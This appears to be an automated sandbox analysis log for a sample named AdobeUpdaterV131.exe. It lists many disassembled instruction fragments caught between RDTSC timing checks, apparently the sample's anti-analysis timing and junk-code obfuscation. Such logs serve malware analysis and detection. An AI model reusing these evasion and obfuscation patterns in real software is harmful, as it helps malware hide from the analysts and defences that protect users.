Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED075D second address: 4ED07D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F09D0D9C3E4h 0x0000000e mov dword ptr [esp], edi 0x00000011 pushad 0x00000012 push esi 0x00000013 pushfd 0x00000014 jmp 00007F09D0D9C3DDh 0x00000019 and cx, EC96h 0x0000001e jmp 00007F09D0D9C3E1h 0x00000023 popfd 0x00000024 pop ecx 0x00000025 pushfd 0x00000026 jmp 00007F09D0D9C3E1h 0x0000002b sub esi, 7EA76DF6h 0x00000031 jmp 00007F09D0D9C3E1h 0x00000036 popfd 0x00000037 popad 0x00000038 mov edi, dword ptr [ebp+08h] 0x0000003b pushad 0x0000003c mov di, cx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED07D9 second address: 4ED082B instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov dword ptr [esp+24h], 00000000h 0x00000010 jmp 00007F09D0731CADh 0x00000015 lock bts dword ptr [edi], 00000000h 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F09D0731CACh 0x00000021 sbb eax, 64C32178h 0x00000027 jmp 00007F09D0731CABh 0x0000002c popfd 0x0000002d movzx ecx, bx 0x00000030 popad 0x00000031 jc 00007F0A427338BAh 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED082B second address: 4ED082F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED082F second address: 4ED0835 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED0835 second address: 4ED0859 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 jmp 00007F09D0D9C3DDh 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F09D0D9C3DDh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED0859 second address: 4ED08B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F09D0731CB7h 0x00000009 xor si, 33FEh 0x0000000e jmp 00007F09D0731CB9h 0x00000013 popfd 0x00000014 mov dx, cx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebx 0x0000001b pushad 0x0000001c mov eax, edx 0x0000001e popad 0x0000001f mov esp, ebp 0x00000021 jmp 00007F09D0731CB1h 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED08B8 second address: 4ED08BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED08BC second address: 4ED08CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED08CF second address: 4ED08D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED02DF second address: 4ED0353 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c call 00007F09D0731CAEh 0x00000011 pop ecx 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007F09D0731CB0h 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F09D0731CADh 0x00000022 sbb si, F356h 0x00000027 jmp 00007F09D0731CB1h 0x0000002c popfd 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 pushad 0x00000031 mov eax, 7FD82E63h 0x00000036 push ecx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED047D second address: 4ED04B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, eax 0x0000000b jmp 00007F09D0D9C3DEh 0x00000010 cmp ecx, 01h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F09D0D9C3DAh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED04B7 second address: 4ED04C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED04C6 second address: 4ED04DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F09D0D9C3E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED04DE second address: 4ED04E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED04E2 second address: 4ED0534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F0A42D9E4BAh 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F09D0D9C3E8h 0x00000015 xor cx, 71F8h 0x0000001a jmp 00007F09D0D9C3DBh 0x0000001f popfd 0x00000020 popad 0x00000021 pop edi 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F09D0D9C3E5h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED0534 second address: 4ED053A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED053A second address: 4ED053E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED053E second address: 4ED0582 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c jmp 00007F09D0731CB6h 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 call 00007F09D0731CADh 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED0582 second address: 4ED0587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED0587 second address: 4ED0596 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F09D0731CAAh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E40691 second address: 4E406C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov si, 9645h 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F09D0D9C3DEh 0x00000013 xor ch, FFFFFFD8h 0x00000016 jmp 00007F09D0D9C3DBh 0x0000001b popfd 0x0000001c push eax 0x0000001d push edx 0x0000001e mov cx, 9B25h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E406C2 second address: 4E40760 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F09D0731CB2h 0x00000008 add ax, C038h 0x0000000d jmp 00007F09D0731CABh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F09D0731CB5h 0x0000001f xor ax, 0ED6h 0x00000024 jmp 00007F09D0731CB1h 0x00000029 popfd 0x0000002a mov ch, A2h 0x0000002c popad 0x0000002d push ebx 0x0000002e pop edi 0x0000002f popad 0x00000030 xchg eax, ebp 0x00000031 jmp 00007F09D0731CB2h 0x00000036 mov ebp, esp 0x00000038 jmp 00007F09D0731CB0h 0x0000003d sub esp, 10h 0x00000040 jmp 00007F09D0731CB0h 0x00000045 lea eax, dword ptr [ebp-10h] 0x00000048 pushad 0x00000049 push esi 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E40760 second address: 4E40780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov cx, 16FFh 0x00000009 popad 0x0000000a push dword ptr [ebp+08h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F09D0D9C3E1h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E40780 second address: 4E407C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov al, dh 0x0000000f pushfd 0x00000010 jmp 00007F09D0731CB4h 0x00000015 adc ax, EE78h 0x0000001a jmp 00007F09D0731CABh 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E407C2 second address: 4E407FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 mov di, 5866h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 movsx ebx, si 0x00000014 pushfd 0x00000015 jmp 00007F09D0D9C3E2h 0x0000001a sub cx, 5808h 0x0000001f jmp 00007F09D0D9C3DBh 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E40873 second address: 4E40877 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E40877 second address: 4E4089E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b call 00007F09D0D9C3E7h 0x00000010 pop ecx 0x00000011 movsx ebx, si 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E4089E second address: 4E408DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F09D0731CB1h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], esi 0x0000000e jmp 00007F09D0731CAAh 0x00000013 push dword ptr [ebp+0Ch] 0x00000016 jmp 00007F09D0731CB0h 0x0000001b lea eax, dword ptr [ebp-08h] 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E408DD second address: 4E408E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E408E1 second address: 4E40927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F09D0731CB8h 0x0000000c add cx, 9BD8h 0x00000011 jmp 00007F09D0731CABh 0x00000016 popfd 0x00000017 popad 0x00000018 nop 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F09D0731CB0h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E40927 second address: 4E40936 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E40936 second address: 4E4094E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F09D0731CB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E4094E second address: 4E40952 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E40952 second address: 4E409D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F09D0731CACh 0x00000010 add ch, FFFFFFC8h 0x00000013 jmp 00007F09D0731CABh 0x00000018 popfd 0x00000019 call 00007F09D0731CB8h 0x0000001e pushfd 0x0000001f jmp 00007F09D0731CB2h 0x00000024 add ax, E558h 0x00000029 jmp 00007F09D0731CABh 0x0000002e popfd 0x0000002f pop eax 0x00000030 popad 0x00000031 nop 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 call 00007F09D0731CB0h 0x0000003a pop eax 0x0000003b call 00007F09D0731CABh 0x00000040 pop ecx 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F10EAA second address: 4F10EB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F10EB0 second address: 4F10EB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F10EB6 second address: 4F10EBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F10EBA second address: 4F10EE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F09D0731CAAh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F10EE5 second address: 4F10EEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F10EEB second address: 4F10EFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F09D0731CADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F10EFC second address: 4F10F1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 mov ah, C9h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F10F1A second address: 4F10F5D instructions: 0x00000000 rdtsc 0x00000002 movsx edi, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007F09D0731CB0h 0x0000000d xor ecx, 09DB8DC8h 0x00000013 jmp 00007F09D0731CABh 0x00000018 popfd 0x00000019 popad 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F09D0731CB5h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F10F5D second address: 4F10F63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F10F63 second address: 4F10F67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F1045E second address: 4F10466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, di 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F10466 second address: 4F10475 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F09D0731CABh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E200CC second address: 4E200D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E200D0 second address: 4E200D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E200D6 second address: 4E200DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E200DC second address: 4E200E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E200E0 second address: 4E20166 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F09D0D9C3E9h 0x00000010 or eax, 760CE7D6h 0x00000016 jmp 00007F09D0D9C3E1h 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F09D0D9C3E0h 0x00000022 and ax, D5F8h 0x00000027 jmp 00007F09D0D9C3DBh 0x0000002c popfd 0x0000002d popad 0x0000002e xchg eax, ebp 0x0000002f pushad 0x00000030 mov dh, ch 0x00000032 jmp 00007F09D0D9C3E1h 0x00000037 popad 0x00000038 mov ebp, esp 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F09D0D9C3DDh 0x00000041 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E40BB8 second address: 4E40BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F09D0731CB1h 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e movzx esi, bx 0x00000011 mov cl, bl 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E40BE0 second address: 4E40BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E40BE4 second address: 4E40C01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E40C01 second address: 4E40C07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E60DCA second address: 4E60DF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F09D0731CB5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E60DF1 second address: 4E60DF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E60DF7 second address: 4E60DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E60DFB second address: 4E60E1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E60E1A second address: 4E60E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx eax, bx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E60E22 second address: 4E60E5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, eax 0x00000005 mov edi, ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c call 00007F09D0D9C3DCh 0x00000011 mov bl, ah 0x00000013 pop edi 0x00000014 push ecx 0x00000015 jmp 00007F09D0D9C3E3h 0x0000001a pop esi 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E60E5B second address: 4E60E5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E60E5F second address: 4E60E6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F10AC4 second address: 4F10AC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F10AC8 second address: 4F10ACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F10ACE second address: 4F10AE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov bx, cx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F10AE7 second address: 4F10B1A instructions: 0x00000000 rdtsc 0x00000002 mov ah, E8h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ax, bx 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F09D0D9C3DEh 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F09D0D9C3E7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F10B1A second address: 4F10B75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov bh, cl 0x0000000e pushfd 0x0000000f jmp 00007F09D0731CB9h 0x00000014 sbb si, F076h 0x00000019 jmp 00007F09D0731CB1h 0x0000001e popfd 0x0000001f popad 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F10B75 second address: 4F10B79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F10B79 second address: 4F10B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F104BB second address: 4F104C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F104C0 second address: 4F104D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov ecx, ebx 0x00000012 mov edi, 6A894264h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F104D8 second address: 4F104DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F104DE second address: 4F104E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F104E2 second address: 4F104E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
